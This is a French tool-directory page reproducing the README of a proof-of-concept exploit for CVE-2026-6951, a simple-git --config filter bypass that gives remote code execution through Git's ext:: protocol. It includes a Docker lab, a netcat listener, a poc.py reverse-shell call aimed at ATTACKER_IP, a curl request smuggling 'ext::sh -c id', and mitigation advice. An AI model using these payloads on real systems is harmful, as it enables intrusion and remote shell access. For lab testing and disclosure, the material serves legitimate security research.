Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-6951 — Proof-of-concept d'exploit pour CVE-2026-6951, un contournement du filtre --config de simple-git permettant une RCE via le protocole Git ext, avec un lab Docker et une charge utile de reverse shell. | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2026-6951
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

Proof-of-concept d'exploit pour CVE-2026-6951, un contournement du filtre --config de simple-git permettant une RCE via le protocole Git ext, avec un lab Docker et une charge utile de reverse shell.

Voir le dépôt
11il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-6951 simple-git Remote Code Execution

★ CVE-2026-6951 simple-git --config Option Filter Bypass RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


Aperçu

CVE-2026-6951 est une vulnérabilité d'exécution de code à distance dans simple-git causée par un correctif incomplet pour CVE-2022-25912. Bien que l'option -c ait été bloquée, l'option équivalente --config n'a pas été correctement restreinte. Un attaquant capable de contrôler les arguments Git peut activer le protocole ext et exécuter des commandes arbitraires via une URL de dépôt ext::.


Versions affectées

CatégorieVersion
Vulnérableversions de simple-git antérieures à 3.36.0
Corrigéesimple-git 3.36.0 ou ultérieure

Cet environnement utilise simple-git 3.35.2 et @simple-git/argv-parser 1.0.3.


Impact

  • Exécution de code à distance avec les privilèges de l'application Node.js
  • Divulgation de fichiers sensibles
  • Accès par reverse shell
  • Modification ou suppression des données de l'application

Environnement

Construisez et exécutez l'environnement vulnérable.

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

Accédez au service à l'adresse :

http://127.0.0.1:9107

Vérifiez l'état du service.

curl -s http://127.0.0.1:9107/api/health

Le dépôt d'exemple intégré est disponible à l'adresse :

file:///srv/git/sample.git

PoC

Démarrez un listener sur le système de l'attaquant.

nc -lvnp 4444

Exécutez le script d'exploitation.

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

La requête suivante exécute la commande id en abusant de l'option --config non restreinte et du protocole ext de Git.

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

Atténuation

  • Mettez à niveau simple-git vers la version 3.36.0 ou ultérieure.
  • Ne transmettez pas directement des options Git contrôlées par l'utilisateur à simple-git.
  • Autorisez uniquement les schémas d'URL de dépôt de confiance et rejetez les URL ext::.
  • Appliquez une validation stricte par liste blanche aux URL de dépôt et aux arguments Git.

Analyse

  • KR :
  • EN :
Télécharger l’outil